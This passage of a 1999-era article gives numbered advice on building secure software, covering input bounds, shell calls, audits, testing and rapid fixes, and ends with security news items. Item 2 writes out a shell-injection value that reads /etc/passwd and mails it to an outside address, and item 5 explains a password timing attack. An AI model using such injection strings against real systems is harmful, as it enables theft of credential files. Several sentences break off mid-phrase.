It is very common for input statements to assume a fixed maximum input
length but not enforce it. For example, we might read input into an
array of 128 characters. If we get longer inputs and find errors, we
might debug the program by making the array longer. But this doesn't
really solve the problem. The real problem is that we are using a fixed
array but not dealing with the error condition associated with
over-sized inputs. The more secure solution is to make certain that we
have proper error handling on inputs that are too big to fit in the
array. We can still change the size of the array if we need to, but no
matter what the size, we still need to check input lengths and properly
handle errors - even if they are 'theoretically' impossible. The reason
we need to handle these cases is that we often depend on other parts of
the system for the conditions that make excessive inputs impossible, but
those conditions may change, and we don't want the program to fail
unpredictably just because somebody else changed an array size or
constant. Here's a rather obvious real-world example:
#define SIZE 1024
read (0, x, 1023);
If somebody comes along and makes SIZE smaller in the next program
revision, there could be an input overflow.
2 - Use of external programs via command interpreters
A lot of the time, we find it easier to run an external program than to
include the same functionality that the other program provides in our
program. This has lots of problems related to the other program
changing 'underneath' us, and this condition should be considered as
well, but in addition to that, one of the most common security problems
comes from the way the other program is called. Rather than use an
'exec' system call or some other such thing, we are often lazy and
choose to use the command interpreter. Being lazy is sometimes good
from a standpoint of the efficiency of your time, but it is often bad
from a security standpoint. Here's an example of a perl script fragment
that has a rather obvious flaw of this sort:
system("glimpse -H /database -y -i $Close $WordPart $d '$string;$string2;$string3' | nor $dir");
If any of these variables contain user input, they might include
something like this:
`cat /etc/passwd | /bin/mail email@example.com`
3 - Unnecessary functionality - like access to Vbasic for running programs
In a recent radio show, I heard a caller liken having visual basic
functions for file deletion in Word to having a 'empty the oil' button
on the dashboard of every car. This is indeed one of the reasons we
have had some 20,000 new Word viruses in the last 6 months. If you
don't need to provide unlimited function to the user - don't. At a
minimum, disable the dangerous functions or make them hard to access by
checking inputs before interpretation.
4 - Including executable content without a good reason
I have a pet peeve. It's the use of Java and ActiveX and similar general
purpose capabilities to do simple things that don't require them. When
I hit a Web page that waits for my mouse to move over the logo before
giving me the menu, I feel offended. This type of thing is mostly a way
to show that you know how to use a language feature - it is not a benefit
to the user - or even particularly clever. When in doubt - cut it out.
5 - Train your people in information protection
It doesn't take all that much effort to learn about common security
flaws in software. Here's another one... Two programs open the same
file without proper file locking. The result is a race condition which
can leave the file in an inconsistent state. If the file is later used
for something like an access control decision - you may lose. Here's
another one... When checking a password, a program checks the first
character first, and returns a failure if it's wrong - otherwise, it
looks at the next character, and so on. The flaw is that the program's
decision time can be used to quickly figure out the password - it's
slower if the first character is right than if it's wrong. I can try
all possibilities in a few seconds. there are lots of these sorts of
things, and I don't have room in this article to list very many of them.
So take the time to study the subject and train your people on it, and
you will make fewer of the mistakes that others have made before them.
6 - Use skilled, experienced, artisans
People ask me how I came to know of so many ways that systems can go
wrong. My answer is simple - I have been watching them go wrong for a
very long time. The longer you write programs, the more things you know
of that can go wrong with them, and the better you tend to do in
avoiding these kinds of mistakes. Ignorance is not bliss - it's full of
Part 2 - Provide for rapid response:
OK - so everybody makes mistakes. But just because you make them,
doesn't mean you have to let them remain mistakes. By responding
quickly and openly, you can (1) fix the problem before it causes much
harm, (2) make your customers believe you care about them, and (3)
get widespread open praise from the security community.
7 - Internet-based software updates - encrypted and authenticated
The fastest low-cost way to update faulty software is to make updates
available via the Internet. But please - don't just let the poor user
download any piece of software and shove it into your program. It will
ruin your reputation and make your customers unhappy. Provide for
strong encryption to keep your trade secrets more secure - and strong
authentication to keep your customers from getting false updates and
installing them. It's inexpensive, easy to use, faster, and more
reliable than the alternatives.
8 - Find and fix them before they effect the customer
What customers really like to see is faults that are fixed before they
cause harm. Just because you released the product doesn't mean you
can't still improve it. Make it part of the support contract and spend
some of your time finding and fixing the faults you missed in the last
distribution. Not only will your product be better, your customers will
be happier, and the bug you fix today won't come back to bite you
9 - Easy reporting of flaws and rapid response to them
When the customer calls, I answer. If they call about a flaw, I try
hard to fix it fast and get the word of the fix out as soon as possible.
If it's a security flaw, I try to get the fix out within a matter of
hours - and the faster the better. I want my customers to report faults
and I want to fix them between the time of the first call and the time
the next bad result happens. So should you.
Part 3 - Use reasonable and prudent measures:
Nobody is or can be perfect today when it comes to commercial software.
We don't really even know what perfect means. But just because you
can't have the perfect body, that doesn't mean you should weigh a ton,
smoke like a fireplace, and eat cheese-burgers for all three meals every
day. Perfection isn't the goal, but reasonable and prudent is. So what
is reasonable and prudent? It depends on the consequences of a mistake.
Here are things that any quality software developer should include in
10 - Do an independent protection audit before release
If you have a security feature in your product, don't risk embarrassment
in front of the whole world and scores of script kiddies breaking into
your systems from all over the world. Have somebody who knows what they
are doing take a look at it first. Have them ask questions and try
things out. The developers of the e-commerce package that was recently
released and left numerous client names, addresses, and credit card
numbers available via a simple hotbot search on the Web did not do
themselves a favor by skimping on a security audit. Adding a single
command to an installation script could have saved them a lot of
embarrassment and their customer's customers a lot of time, money, and
11 - Use good change control in your software update process
The US telephone systems have crashed on a national scale several times
because the people who maintained the software didn't have a process in
place to compare the last version to the next version. They certainly
would have noticed the change in priority that brought down several
major cities for about a week if they had simply run a standard check.
Look for changes, make sure they make sense, and save yourself a lot of
embarrassment and ridicule.
12 - Provide a secure manufacturing and distribution mechanism
When the largest software developer in the world released a computer
virus on a major product's distribution disks, they were not the first,
nor were they the last to have their content corrupted between the test
phase and the manufacturing phase. At a minimum, take samples off the
production line before shipment, compare them to the original sources
used in the testing phase, and re-test them with your standard test
13 - Track who does what and attribute faults to root causes
Everybody makes mistakes, but a surprisingly small number of people make
a surprisingly large portion of them, and the majority of the mistakes
are very similar to each other. When you track these things down and
find root causes, you can also find ways to eliminate them in the
future. That doesn't mean you will get to perfection, but it sure is
nice to be a little bit closer.
Part 4 - Provide a beta-testing process that helps to find the flaws:
Lots of people complain that the customers end up testing the products
these days, and I think it's largely true. The rush to market seems to
override all prudence in product quality for some companies. But I am a
firm believer in the alpha test and the beta test.
14 - Internal beta-testing should seek out flaws relentlessly
If you don't have an internal testing team that knows about security
testing, get one. The cost of fixing a security hole in the field is
several orders of magnitude more expensive than finding it before the
15 - Get some monkeys on your keyboards
You would be amazed at how easily a 2-year old can crash your programs.
They don't know enough to do what you expect, and chances are you don't
know enough to anticipate what they will do. I find flaws by simply
shoving random inputs into programs and waiting for them to crash.
There is a good chance that the crash was the result of a flaw that
could be exploited for a security attack.
16 - Build a repeatable testing capability
You need to be able to try it again under identical conditions.
Otherwise, you will never be sure you fixed it when you think you fixed
it. Whatever the 'it' is in this case, repeatability and automation of
the testing process is a major key to success and efficiency. If you
can't buy it - build it.
17 - Get an outside community with an interest in finding and fixing holes
If you can't test it well enough yourself, figure out a way to get
outsiders interested enough to help you find the holes. They will not
be as efficient as you will if you try to do it well, but it's better
Part 5 - Just because you can't be perfect doesn't mean you shouldn't try:
18 - Don't throw up your hands - work the issues
I've seen lots of people who simply throw up their hands and think that
this problem is too difficult to solve. I think they are wrong. Even
if you can't do it perfectly, you have to do it well enough to compete
with security as a basis.
19 - Use constant quality improvement to enhance your security
Don't do what a major computer manufacturer did. They fixed a bug in a
system library that allowed anyone on the Internet to gain unlimited
access to any of their systems, and in the next version, they undid the
fix. Strive to always get better and to propagate your fixes forward in
time. Version control includes propagation of fixes into new versions.
20 - People that complain about 'defensive programming' don't belong
I've heard it a hundred times. 'That's defensive programming' ...
'That can never happen' ... 'Nobody will ever figure that out' ...
They are all wrong and they don't belong in a professional programming
environment. Programs that depend on other programs and programmers
that depend on other programmers must understand that the other person's
mistake can turn into your security hole. You need to check your
assumptions - at design time - at compile time - at run time - at
testing time - all the time. The same programmers that give up tens of
thousands of CPU cycles to save some programming effort by calling an
external program, seem to think it is inefficient to do bounds checking
on input arrays. It's an example of a false efficiency.
Bonus - Every problem is also an opportunity
These days, security is something you can take to the bank, and
insecurity is something that can send you to the poor-house. Think of
this article as your chance to make millions of dollars by doing a
better job than your competitors at something that top management is
starting to acknowledge is a higher priority than a paper-clip that beeps
on the screen and stops your work to tell you how to do something you
don't actually want to do. Take this opportunity to make a better
product with a lower life-cycle cost, higher return on investment, and
no embarrassing press.
Part 6 - This Week...
Finally, here is an extract of a week's worth of news items related to
software security faults that got out into the public. Try to avoid
making this list...
04 May 1999 Two More IE 5 Security Holes
One bug lets people who use your computer see where you've been online
and another allows users who share browsers to access password-protected
02 May 1999: New Code Breaking Device Proposed
An Israeli computer scientist, who is also the S in the widely used RSA
algorithm, presented a paper which describes a device he says will be
capable of cracking 512 bit keys.
29 April 1999: ColdFusion's Vulnerability the Target of Increased Hacking
A security hole which resulted from a sample application sent with
ColdFusion Application Server's documentation allows hackers access to
all data stored on the web server. Since a new posting about this
vulnerability last week, more than 100 sites using the software have
29 April 1999: Intel Chip's Serial Number Rears its Head Again
While Intel has distributed software which it says hides its chip's
embedded serial number, Zero-Knowledge Systems, a Canadian software
company, has placed a program on the web which makes it visible again.